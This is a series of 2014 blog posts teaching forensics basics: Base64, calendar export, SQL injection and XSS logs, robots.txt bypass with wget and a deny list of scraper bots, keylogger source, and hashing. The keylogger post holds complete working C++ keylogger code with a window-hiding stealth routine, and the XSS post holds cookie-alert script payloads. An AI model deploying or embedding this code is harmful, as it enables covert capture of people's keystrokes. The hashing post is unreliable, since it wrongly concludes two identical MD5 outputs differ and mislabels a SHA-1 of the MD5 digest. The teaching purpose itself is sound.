Friday, November 21, 2014

Back to basics - Develop Forensic Analyst Mindset

This is a must-watch video and a must-play game if you want to get started in developing the investigative mindset that is essential in incident response and cybersecurity investigations.

You cannot just read about cybersecurity; you need to start developing skills, but you will see that even basic skills can be challenging once you start using them in real environments.

This video also shows that basic encoding, such as Base64, is used by real applications to store passwords. It demonstrates how Base64 works and how important log analysis is in this field.

http://youtu.be/9sGhmYlBrXU
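To get a feel for how little protection an encoding like Base64 offers, here is a minimal C# sketch (the sample password and names are made up for illustration) that stores and then instantly recovers a password the way a poorly designed application might:

using System;
using System.Text;

class Base64Demo
{
    static void Main()
    {
        // A hypothetical password an application might store "obfuscated" with Base64
        string password = "S3cr3tPass!";
        string stored = Convert.ToBase64String(Encoding.UTF8.GetBytes(password));
        Console.WriteLine("Stored value : " + stored);

        // Anyone who finds the stored value can reverse it instantly - no key required
        string recovered = Encoding.UTF8.GetString(Convert.FromBase64String(stored));
        Console.WriteLine("Recovered    : " + recovered);
    }
}

Encoding is not encryption; if you can recognize Base64 in a configuration file or a log, you can read the secret.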


Tuesday, October 28, 2014

Back to basics - Convert ICS to HTML and CSV

The discrete nature of calendar entries makes it very difficult to see the overall picture or, in an investigation, a pattern of events. We need to see the events in chronological order in a single document that we can use as a report, or chart the values so that non-technical professionals can easily understand the sequence of events.

Thunderbird is one of the most useful and versatile applications when it comes to Internet communication. In this post, I will explore its capability to convert .ics files, the only format that Google Calendar exports.

I also created a video to accompany this blog post: http://youtu.be/WbBRhP6VXbs

So, in order to follow this process, you need to download and install Thunderbird: https://www.mozilla.org/en-US/thunderbird/download.

Log in to your Google Calendar and create a new calendar.

Add new events to the new calendar and export the calendar as an .ics file.  Notice that the date and time stamps in the exported .ics file are not very user friendly, so they might need to be converted manually to make sense to non-technical professionals.  On the other hand, the exported HTML and CSV files show the date and time stamps in a user-friendly format that is easy to report and to chart, without any manual conversion or risk of human error.
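To illustrate why the raw .ics timestamps are hard to read, here is a minimal C# sketch (the DTSTART value is a made-up example) that converts a compact iCalendar UTC timestamp into a reader-friendly string, which is essentially the conversion the HTML and CSV exports do for you:

using System;
using System.Globalization;

class IcsTimestampDemo
{
    static void Main()
    {
        // A typical UTC timestamp as it might appear in an exported .ics file (hypothetical value)
        string dtstart = "20141028T130000Z";

        // Parse the compact iCalendar format into a DateTime
        DateTime parsed = DateTime.ParseExact(
            dtstart,
            "yyyyMMdd'T'HHmmss'Z'",
            CultureInfo.InvariantCulture,
            DateTimeStyles.AssumeUniversal | DateTimeStyles.AdjustToUniversal);

        // Print it in a form that is easy to put in a report
        Console.WriteLine(parsed.ToString("dddd, MMMM d, yyyy h:mm tt 'UTC'"));
    }
}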


Import the .ics file into Thunderbird's Lightning add-on, which adds the calendar feature to Thunderbird.

Export the calendar as .ics, .html, or .csv format.


The HTML document can be used directly as a report, but the CSV format gives more flexibility to analyze the data or create a chart that shows clear patterns of events.



Thus, digital forensics is largely about pattern recognition, but in some cases a pattern cannot emerge from data in its native format.  So, we need to pay attention to which file types an application can import, and explore its ability to export the data into different formats that aid our analysis and help identify the patterns that solve cases.

Monday, October 27, 2014

Back to basics - SQL and XSS

This post is accompanied by a video explaining this process and what you can do about it.

http://youtu.be/-W3efiMT8H0

Sample web page to test JavaScript in a browser.  Save the following code in a text file, name it test.html, and open it in your browser to see what it does.

<HTML>
<HEAD>
              <script> window.open('http://zoltandfw.blogspot.com/','_blank')</script>
              <script> alert(document.cookie)</script>
              <script> alert("Your account has been compromised, please call (111)222-3333 to report!!!")               </script>
</HEAD>
<BODY>
              Just a test for JavaScripts
</BODY>
</HTML>

Sample log file entries showing the kind of information that might be collected in log files, either to investigate after the fact or to monitor for real-time response.  A short sketch after the log shows how the injected query in connection 123 could have been built.

141027  7:39:45  122 Connect root@localhost on 
 122 Init DB badbank
 122 Query SELECT userid, accountnumber FROM badbank_accounts WHERE username='zoltan' AND password='9f1c050c2b226c2154d17a3ff9a602f6'
 122 Quit
141027  7:41:55  123 Connect root@localhost on 
 123 Init DB badbank
 123 Query SELECT userid, accountnumber FROM badbank_accounts WHERE username='zoltan' -- ' AND password='d41d8cd98f00b204e9800998ecf8427e'
 123 Quit
141027  8:00:30  124 Connect root@localhost on 
 124 Init DB badbank
 124 Quit
 125 Connect root@localhost on 
 125 Init DB badbank
 125 Quit
141027  8:42:47  126 Connect ODBC@localhost as  on 
 126 Query select @@version_comment limit 1
141027  8:42:55  126 Query show databases
141027  8:43:26  126 Query SELECT DATABASE()
 126 Init DB Access denied for user ''@'localhost' to database 'badbank'
141027  8:43:41  126 Quit

...

141027  9:04:20  130 Query select * from badbank_transactions
141027  9:05:22  213 Connect root@localhost on 
 213 Init DB badbank
 213 Query SELECT balance FROM badbank_accounts WHERE userid=61
 213 Quit
141027  9:05:37  214 Connect root@localhost on 
 214 Init DB badbank
 214 Query SELECT balance FROM badbank_accounts WHERE userid=61
 214 Query SELECT userid FROM badbank_accounts WHERE username='victim1'
 214 Query UPDATE badbank_accounts SET balance=balance-1 WHERE userid=61
 214 Query UPDATE badbank_accounts SET balance=balance+1 WHERE userid=60
 214 Query INSERT INTO badbank_transactions (userid,time,withdrawn,transactor,transfernote) VALUES (61,NOW(),1,60,'<script> alert(document.cookie)</script>')
 214 Query INSERT INTO badbank_transactions (userid,time,deposited,transactor,transfernote) VALUES (60,NOW(),1,61,'<script> alert(document.cookie)</script>')
 214 Quit
141027  9:05:41  215 Connect root@localhost on 
 215 Init DB badbank
 215 Quit
 216 Connect root@localhost on 
 216 Init DB badbank
 216 Quit
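The log above shows the server-side effect of unsanitized input. Connection 123 contains username='zoltan' -- ', which comments out the password check entirely (the hash d41d8cd98f00b204e9800998ecf8427e is simply the MD5 of an empty string, since the attacker left the password blank). Here is a minimal C# sketch of how such a vulnerable query string is typically built by concatenation; the table and column names are taken from the log, everything else is illustrative:

using System;

class InjectionDemo
{
    // Vulnerable pattern: user input is concatenated straight into the SQL text
    static string BuildQuery(string username, string passwordHash)
    {
        return "SELECT userid, accountnumber FROM badbank_accounts " +
               "WHERE username='" + username + "' AND password='" + passwordHash + "'";
    }

    static void Main()
    {
        // Normal login attempt, like query 122 in the log
        Console.WriteLine(BuildQuery("zoltan", "9f1c050c2b226c2154d17a3ff9a602f6"));

        // Injected username: the -- sequence comments out the password check,
        // producing the query seen in log entry 123
        Console.WriteLine(BuildQuery("zoltan' -- ", "d41d8cd98f00b204e9800998ecf8427e"));
    }
}

The same lack of sanitization lets the <script> payloads in the transfernote column reach other users' browsers, which is the stored XSS attempt shown at the end of the log.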

Sunday, October 26, 2014

Back to Basics - Information Assurance - Robots.txt

Note: If you like these blog posts, please click the +1 !

In some cases, you might need to crawl a web site to gather keywords or email addresses. Web sites can use robots.txt files to discourage simple automated crawling of the entire website or part of it. The robots.txt file gives instructions to web robots about what is not allowed on the web site using the Robots Exclusion Protocol. So, if a website contains a robots.txt like:

User-Agent: * 
Disallow: / 

This robots.txt disallows all robots from visiting any page on the web site. So, if a robot tries to visit a page such as http://www.domain.topdomain/examplepage.html, the robots.txt in the root of the website, http://www.domain.topdomain/robots.txt, will not permit the robot to access the site. However, the robots.txt file can be ignored by many web crawlers, so it should not be used as a security measure to hide information. We should also be able to ignore such a simple measure when investigating or testing web site security. I have mentioned in previous posts that wget is a very useful tool for downloading a web page, a website, or malware from the command line. This simple tool can also be configured to ignore the robots.txt file, but by default it respects it, so you need to specifically tell the tool to ignore its directions.

wget -e robots=off --wait 1 -m http://domain.topdomain 
FINISHED --2014-10-26 11:12:36-- 
Downloaded: 35 files, 22M in 19s (1.16 MB/s) 

Running wget without the robots=off option produces the following result.

wget -m http://domain.topdomain 
FINISHED --2014-10-26 11:56:53-- 
Downloaded: 1 files, 5.5K in 0s (184 MB/s)

It is clear from this example that we would have missed 34 files by not being familiar with this simple file and its purpose.
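For contrast with wget's -e robots=off behavior, here is a rough sketch of what a well-behaved crawler does before fetching anything. This is a hedged illustration only: real robots.txt parsers match user-agent groups and path prefixes rather than doing a plain text search, and domain.topdomain is just a placeholder.

using System;
using System.Net;

class RobotsCheck
{
    static void Main()
    {
        // Placeholder site used only for illustration
        string site = "http://domain.topdomain";

        // A polite crawler fetches robots.txt first ...
        string robots = new WebClient().DownloadString(site + "/robots.txt");

        // ... and backs off if the catch-all rule disallows everything
        bool blockedForEveryone = robots.Contains("User-Agent: *") && robots.Contains("Disallow: /");
        Console.WriteLine(blockedForEveryone
            ? "Polite robots will not crawl this site."
            : "Crawling is at least partly allowed.");
    }
}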

Using "User-Agent: * " is a great option to block robots of unknown name blocked unless the robots use other methods to get to the website contents. Let's try and see what will happen if we use wget without robots=off.

 
As you can see, the User-Agent is set to Wget/1.11 (the default Wget/version format), so a robots.txt with contents like the list below would catch this utility and prevent it from getting the website contents.

Note: The three orange-highlighted packets are the 3-way handshake, so the request for the resource with the User-agent setting is the first packet following the three-way handshake.  That might be a good pattern for alarm settings.

wget also has an option to change the user-agent default string to anything the user wants to use.

wget --user-agent=ZOLTAN -m http://domain.topdomain 



As you can see in the packet capture, the user-agent was overwritten as the option promised, but the website still allowed only a single file download because the User-agent: * rule caught the unknown string.  So, robots.txt can help protect a website to a certain extent, but the -e robots=off option did retrieve the whole website content even though the packets contained an unmodified User-agent setting.

robots.txt can have specific entries to keep unsafe robots away from a web site or to provide basic protection from these "pests" (this list is not exhaustive, but it can be a good source for learning about malicious packet contents and a good resource for further reading on each of these software tools):

User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: BackDoorBot/1.0
Disallow: /

User-agent: Black Hole
Disallow: /

User-agent: BlowFish/1.0
Disallow: /

User-agent: Bookmark search tool
Disallow: /

User-agent: BotALot
Disallow: /

User-agent: BuiltBotTough
Disallow: /

User-agent: Bullseye/1.0
Disallow: /

User-agent: BunnySlippers
Disallow: /

User-agent: Cegbfeieh
Disallow: /

User-agent: CheeseBot
Disallow: /

User-agent: CherryPicker
Disallow: /

User-agent: CherryPicker /1.0
Disallow: /

User-agent: CherryPickerElite/1.0
Disallow: /

User-agent: CherryPickerSE/1.0
Disallow: /

User-agent: CopyRightCheck
Disallow: /

User-agent: cosmos
Disallow: /

User-agent: Crescent
Disallow: /

User-agent: Crescent Internet ToolPak HTTP OLE Control v.1.0
Disallow: /

User-agent: DittoSpyder
Disallow: /

User-agent: EmailCollector
Disallow: /

User-agent: EmailSiphon
Disallow: /

User-agent: EmailWolf
Disallow: /

User-agent: EroCrawler
Disallow: /

User-agent: ExtractorPro
Disallow: /

User-agent: FairAd Client
Disallow: /

User-agent: Flaming AttackBot
Disallow: /

User-agent: Foobot
Disallow: /

User-agent: Gaisbot
Disallow: /

User-agent: GetRight/4.2
Disallow: /

User-agent: grub
Disallow: /

User-agent: grub-client
Disallow: /

User-agent: Harvest/1.5
Disallow: /

User-agent: hloader
Disallow: /

User-agent: httplib
Disallow: /

User-agent: humanlinks
Disallow: /

User-agent: ia_archiver
Disallow: /

User-agent: ia_archiver/1.6
Disallow: /

User-agent: InfoNaviRobot
Disallow: /

User-agent: Iron33/1.0.2
Disallow: /

User-agent: JennyBot
Disallow: /

User-agent: Kenjin Spider
Disallow: /

User-agent: Keyword Density/0.9
Disallow: /

User-agent: larbin
Disallow: /

User-agent: LexiBot
Disallow: /

User-agent: libWeb/clsHTTP
Disallow: /

User-agent: LinkextractorPro
Disallow: /

User-agent: LinkScan/8.1a Unix
Disallow: /

User-agent: LinkWalker
Disallow: /

User-agent: LNSpiderguy
Disallow: /

User-agent: lwp-trivial
Disallow: /

User-agent: lwp-trivial/1.34
Disallow: /

User-agent: Mata Hari
Disallow: /

User-agent: Microsoft URL Control
Disallow: /

User-agent: Microsoft URL Control - 5.01.4511
Disallow: /

User-agent: Microsoft URL Control - 6.00.8169
Disallow: /

User-agent: MIIxpc
Disallow: /

User-agent: MIIxpc/4.2
Disallow: /

User-agent: Mister PiX
Disallow: /

User-agent: moget
Disallow: /

User-agent: moget/2.1
Disallow: /

User-agent: mozilla/4
Disallow: /

User-agent: Mozilla/4.0 (compatible; BullsEye; Windows 95)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 2000)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows 98)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows ME)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows NT)
Disallow: /

User-agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows XP)
Disallow: /

User-agent: mozilla/5
Disallow: /

User-agent: MSIECrawler
Disallow: /

User-agent: NetAnts
Disallow: /

User-agent: NetMechanic
Disallow: /

User-agent: NICErsPRO
Disallow: /

User-agent: Offline Explorer
Disallow: /

User-agent: Openbot
Disallow: /

User-agent: Openfind
Disallow: /

User-agent: Openfind data gathere
Disallow: /

User-agent: Oracle Ultra Search
Disallow: /

User-agent: PerMan
Disallow: /

User-agent: ProPowerBot/2.14
Disallow: /

User-agent: ProWebWalker
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Python-urllib
Disallow: /

User-agent: QueryN Metasearch
Disallow: /

User-agent: Radiation Retriever 1.1
Disallow: /

User-agent: RepoMonkey
Disallow: /

User-agent: RepoMonkey Bait & Tackle/v1.01
Disallow: /

User-agent: RMA
Disallow: /

User-agent: searchpreview
Disallow: /

User-agent: SiteSnagger
Disallow: /

User-agent: SpankBot
Disallow: /

User-agent: spanner
Disallow: /

User-agent: suzuran
Disallow: /

User-agent: Szukacz/1.4
Disallow: /

User-agent: Teleport
Disallow: /

User-agent: TeleportPro
Disallow: /

User-agent: Telesoft
Disallow: /

User-agent: The Intraformant
Disallow: /

User-agent: TheNomad
Disallow: /

User-agent: TightTwatBot
Disallow: /

User-agent: Titan
Disallow: /

User-agent: toCrawl/UrlDispatcher
Disallow: /

User-agent: True_Robot
Disallow: /

User-agent: True_Robot/1.0
Disallow: /

User-agent: turingos
Disallow: /

User-agent: URL Control
Disallow: /

User-agent: URL_Spider_Pro
Disallow: /

User-agent: URLy Warning
Disallow: /

User-agent: VCI
Disallow: /

User-agent: VCI WebViewer VCI WebViewer Win32
Disallow: /

User-agent: Web Image Collector
Disallow: /

User-agent: WebAuto
Disallow: /

User-agent: WebBandit
Disallow: /

User-agent: WebBandit/3.50
Disallow: /

User-agent: WebCopier
Disallow: /

User-agent: WebEnhancer
Disallow: /

User-agent: WebmasterWorldForumBot
Disallow: /

User-agent: WebSauger
Disallow: /

User-agent: Website Quester
Disallow: /

User-agent: Webster Pro
Disallow: /

User-agent: WebStripper
Disallow: /

User-agent: WebZip
Disallow: /

User-agent: WebZip/4.0
Disallow: /

User-agent: Wget
Disallow: /

User-agent: Wget/1.5.3
Disallow: /

User-agent: Wget/1.6
Disallow: /

User-agent: WWW-Collector-E
Disallow: /

User-agent: Xenu's
Disallow: /

User-agent: Xenu's Link Sleuth 1.1c
Disallow: /

User-agent: Zeus
Disallow: /

User-agent: Zeus 32297 Webster Pro V2.9 Win32
Disallow: /

User-agent: Zeus Link Scout
Disallow: /

Saturday, October 25, 2014

Back to Basics - Intellectual Property

This post is about practicing critical thinking in intellectual property cases and tracking down old or previous versions of websites that use copyrighted material. We can also use this technique to locate images where only a portion of the image is used or relevant to the case.


Tuesday, October 21, 2014

Code2Learn - Keylogger

Now, this example is for educational purposes only and you should not run this code on your own machine if you are not familiar with all of the lines in this code.

Keyloggers are often viewed as something only people with bad intentions write, but a keylogger is nothing more than a program that monitors the keys pressed on the keyboard and saves them to a file for later review.

In an investigation, you might have to look at code and identify basic patterns in order to "guess" what the code is designed to do.  In this example, you can see the basic features of a keylogger, and I hope it shows that simple code like this can be added to any program to accomplish the same thing.  Thus, so-called pirated, illegal, or cracked versions of applications can contain this type of added code.  For the user, the functionality of the application will not visibly change, but the application might have "added features" the user is not aware of.

In many cases, executable analysis is just a simple strings search that can reveal keywords compiled into the executable; these can be googled and lead to an understanding of some of the program's features.  Here we can see the banner message and the clear-text name of the file used to collect the captured keystrokes.  If the code connected to a server on the Internet, we might even see the URL or the IP address of the server the data is exfiltrated to.

So, in this case a simple keyword search on the executable reveals a portion of my code, and thus its intended purpose.  Code can be analyzed by non-programmers and still yield a successful heuristic conclusion about what the code, or a portion of it, is designed to do.
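If you do not have a strings utility at hand, the idea behind it is simple enough to sketch. The following C# snippet scans a compiled binary for runs of printable ASCII characters; the file name keylogger.exe is just a placeholder for whatever executable you are examining.

using System;
using System.IO;
using System.Text;

class MiniStrings
{
    static void Main()
    {
        // Read the whole executable and print every run of printable ASCII characters
        byte[] data = File.ReadAllBytes("keylogger.exe");
        StringBuilder current = new StringBuilder();

        foreach (byte b in data)
        {
            if (b >= 0x20 && b <= 0x7E)        // printable ASCII range
            {
                current.Append((char)b);
            }
            else
            {
                if (current.Length >= 6)        // only report runs long enough to be meaningful
                    Console.WriteLine(current.ToString());
                current.Clear();
            }
        }
        if (current.Length >= 6)                // flush a trailing run, if any
            Console.WriteLine(current.ToString());
    }
}

Running something like this against the compiled keylogger would surface the banner text and the collect.txt file name without ever opening the source.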



Warning: You will need to use Task Manager to stop this program once it is running.

#include<iostream>
#include<windows.h>
#include<winuser.h>
#include<fstream>
#include <string>

using namespace std;
int Save(int key_stroke, string file);
void Stealth();

int main(){
    //Stealth();   // uncomment to hide the console window

    int i;   // use int, not char: virtual-key codes go up to 190 and would overflow a signed char

    cout << "This is my example of a keylogger - Zoltan" << endl;

    // Poll every virtual-key code in the range and record the ones that were just pressed
    while (1){
        for (i = 8; i <= 190; i++){
            if (GetAsyncKeyState(i) == -32767)
                Save(i, "collect.txt");
        }
    }
    return 0;
}

int Save(int key_stroke, string file){
    if ((key_stroke == 1) || (key_stroke == 2))   // ignore mouse buttons
        return 0;

    ofstream outFile;
    char pressed = key_stroke;
    outFile.open(file, std::fstream::app);   // append to the collection file
    //cout << VK_OEM_PERIOD << endl;         // leftover debug output
    outFile << "\n";                         // one captured key per line
    // Translate special virtual-key codes to readable labels;
    // break after each case so every keystroke is logged only once
    switch (key_stroke){
    case 8:
        outFile << "[BACKSPACE]";
        break;
    case 13:
        outFile << " ";                      // ENTER, recorded as a space
        break;
    case VK_OEM_PERIOD:                      // same as 190
        outFile << ".";
        break;
    case VK_TAB:
        outFile << "[TAB]";
        break;
    case VK_SHIFT:
        outFile << "[SHIFT]";
        break;
    case VK_CONTROL:
        outFile << "[CONTROL]";
        break;
    case VK_ESCAPE:
        outFile << "[ESCAPE]";
        break;
    case VK_END:
        outFile << "[END]";
        break;
    case VK_LEFT:
        outFile << "[LEFT]";
        break;
    case VK_UP:
        outFile << "[UP]";
        break;
    case VK_RIGHT:
        outFile << "[RIGHT]";
        break;
    case VK_DOWN:
        outFile << "[DOWN]";
        break;
    case VK_HOME:
        outFile << "[HOME]";
        break;
    case 110:                                // numeric keypad decimal point
        outFile << ".";
        break;
    default:
        outFile << pressed;                  // everything else is written as its character value
        break;
    }
    outFile.close();

    return 0;
}

void Stealth(){
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
}


Code2Learn - Hashing

One of the most basic concepts we learn in digital forensics is hashing, which ensures our evidence is not changed after acquisition.  Hashing helps verify the integrity of the data and helps reduce the dataset by identifying known good files.  Hashes can also identify known "bad" data, and partial hashes can identify data that is close enough to warrant further investigation for relevance.  Of course, hashes are also used to store passwords for authentication.  There are many algorithms available, but every software implementation of a given algorithm must produce exactly the same result.

When using libraries and third-party implementations, you still need to test and validate whether the implementation works as designed and is implemented properly.

The following is an implementation using a third-party library:

using System;
using XCrypt;
//http://www.codeproject.com/Articles/483490/XCrypt-Encryption-and-decryption-class-wrapper
//Click to download source "Download source code"
//Click on Project -> Add Reference -> navigate to where you have extracted XCrypt.dll

namespace hashMD5
{
    class Program
    {
        static void Main(string[] args)
        {
            XCryptEngine encrypt = new XCryptEngine();
            encrypt.InitializeEngine(XCryptEngine.AlgorithmType.MD5);
            Console.WriteLine("Enter string to hash:");
            string inText = Console.ReadLine();
            string hashText = encrypt.Encrypt(inText);
            Console.WriteLine("Input: {0}\r\nHash: {1}", inText, hashText);
            byte[] temp=GetBytes(hashText);  //for debugging to see each byte value
            Console.ReadLine();

        }
        static byte[] GetBytes(string str)
        {
            byte[] bytes = new byte[str.Length * sizeof(char)];
            System.Buffer.BlockCopy(str.ToCharArray(), 0, bytes, 0, bytes.Length);
            return bytes;
        }
    }
}

Running the code results in the following output.

Enter string to hash:
Richland College
Input: Richland College
Hash: zlC4yZP3XqYqqboh5Lv4IA== 

The output looks strange, more like Base64 than MD5.  We can place breakpoints in the code and inspect the actual byte values to see whether the result is even close to the expected value.


We can see the byte values are 122, 0, 108, 0, ...
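Those values are simply the UTF-16 character codes of the Base64 text itself (122 is 'z', 0 is the high byte, 108 is 'l', and so on). To inspect the digest bytes the string actually represents, a quick sketch like this decodes the Base64 first and prints the raw bytes as hex:

using System;

class DecodeDemo
{
    static void Main()
    {
        // The first sample's output, copied from above
        string output = "zlC4yZP3XqYqqboh5Lv4IA==";

        // Decode the Base64 text back to the raw bytes it represents,
        // which is a fairer comparison than looking at the bytes of the string object
        byte[] raw = Convert.FromBase64String(output);
        Console.WriteLine(BitConverter.ToString(raw).Replace("-", ""));
    }
}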

Now, let's see another implementation of MD5:

using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;

namespace anotherHashMD5SHA1
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter an message: ");
            string message = Console.ReadLine();
            System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
            MD5 md5 = new MD5CryptoServiceProvider();
            SHA1 sha1 = new SHA1CryptoServiceProvider();
            byte[] messageBytes = encoding.GetBytes(message);
            byte[] hashmessage = md5.ComputeHash(messageBytes);
            string stringMD5 = ByteToString(hashmessage);
            hashmessage = sha1.ComputeHash(hashmessage);
            string stringSHA1 = ByteToString(hashmessage);
            Console.WriteLine("MD5: {0}\r\nSHA-1: {1}", stringMD5, stringSHA1);
//Console.WriteLine("MD5: {0}\r\nSHA-1: {1}",System.Text.Encoding.Default.GetString(hashmessage), stringSHA1);
            Console.ReadLine();

        }
        public static string ByteToString(byte[] buff)
        {
            string sbinary = "";
            for (int i=0; i < buff.Length; i++)
            {
                sbinary += buff[i].ToString("X2");
            }
            return (sbinary);
        }
    }
}

And the output of this code is as follows:

Enter a message:
Richland College
MD5: CE50B8C993F75EA62AA9BA21E4BBF820
SHA-1: B3A6FC316A94949871594C633C8977D28C70E8B7

So, we also need to look at the resulting byte values of the hash in order to tell whether we simply have the same bytes displayed in a different encoding, or whether the results are really different.


No, we do not have the same byte values; this one gives us 206, 80, 184, 201, ..., so which one do we trust and use in our code?

You can use a few IT tools and compare their results.  I recommend HashOnClick:
http://www.2brightsparks.com/onclick/hoc.html

You can create a simple text file; in this case, I used the same text I used with the tools, "Richland College".


CE50B8C993F75EA62AA9BA21E4BBF820 testfile.txt

The results show the same value as the second code sample, so the second code sample should be implemented.

So, as you can see, there are many implementations of the same algorithm.  Programmers should use libraries and code from others as much as possible to increase productivity and reduce development time, but only responsible code selection leads to meaningful and more secure code.  Maybe secure coding should have a prerequisite of knowing IT tools and understanding what we expect a tool to do, before we implement code by compiling and "crossing our fingers".